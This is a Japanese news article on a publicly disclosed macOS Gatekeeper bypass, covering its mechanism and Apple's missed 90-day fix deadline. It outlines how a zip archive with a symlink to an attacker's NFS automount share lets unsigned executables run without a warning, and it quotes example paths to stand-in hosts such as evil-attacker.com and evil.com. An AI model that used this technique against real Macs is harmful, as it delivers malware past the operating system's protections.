セキュリティ研究者のフィリッポ・カヴァッラリン氏は、macOSのGatekeeperセキュリティ機能を回避する方法を公開した。この回避策は、先週リリースされたmacOS 10.14.5の時点でもAppleによって未解決のままとなっている。

Gatekeeperは、アプリケーションのダウンロード直後に検証を行うmacOSのセキュリティツールです。これにより、ユーザーの同意なしにアプリケーションが実行されるのを防ぎます。ユーザーがMac App Store以外からアプリをダウンロードする際、GatekeeperはコードがAppleによって署名されているかどうかを確認します。コードが署名されていない場合、ユーザーが直接許可しない限り、アプリは起動しません。

しかし、Cavallarin氏は自身のブログで、Gatekeeperの機能を完全に回避できると述べている。現在の実装では、Gatekeeperは外付けドライブとネットワーク共有の両方を「安全な場所」と見なしている。つまり、これらの場所にあるアプリケーションは、コードの再チェックなしに実行できるのだ。さらにCavallarin氏は、ユーザーが「簡単に」騙されてネットワーク共有ドライブをマウントしてしまい、そのフォルダ内のあらゆるファイルがGatekeeperを通過できてしまうと説明している。

セキュリティ研究者は次のように説明する。

最初の正当な機能は automount (別名 autofs) です。これにより、ユーザーは「特別な」パス (この場合は「/net/」で始まる任意のパス) にアクセスするだけで、ネットワーク共有を自動的にマウントできるようになります。

たとえば、「ls /net/evil-attacker.com/sharedfolder/」を実行すると、OS は NFS を使用してリモート ホスト (evil-attacker.com) 上の「sharedfolder」の内容を読み取ります。

2 番目の正当な機能は、zip アーカイブに任意の場所 (自動マウント エンドポイントを含む) を指すシンボリック リンクを含めることができ、zip ファイルを解凍する MacOS 上のソフトウェアがシンボリック リンクを作成する前にそのチェックを実行しないことです。

これがどのように機能するかの例:

このエクスプロイトの仕組みをよりよく理解するために、次のシナリオを考えてみましょう。
攻撃者は、自分が制御する自動マウント エンドポイント (例: Documents -> /net/evil.com/Documents) へのシンボリック リンクを含む zip ファイルを作成し、それを被害者に送信します。

被害者は悪意のあるアーカイブをダウンロードし、それを解凍してシンボリックリンクをたどります。

被害者は攻撃者が管理する場所にいるものの、Gatekeeperによって信頼されているため、攻撃者が管理する実行ファイルは警告なしに実行できます。Finderの設計（例：.app拡張子を非表示、タイトルバーからフルパスを非表示）により、この手法は非常に効果的で、発見が困難です。

カヴァラリン氏は、この脆弱性について2月22日にAppleに報告し、同社は先週リリースされたmacOS 10.14.5で修正する予定だったと述べています。しかし、macOS 10.14.5のリリース時点でもこの脆弱性は未修正のままであり、カヴァラリン氏によるとAppleは彼のメールへの返信を停止しているとのことです。Appleに提示した90日間の猶予期間が経過したため、カヴァラリン氏は本日、この脆弱性を公表しました。

以下の欠陥のビデオデモをご覧ください。

havebin.com を Google ニュース フィードに追加します。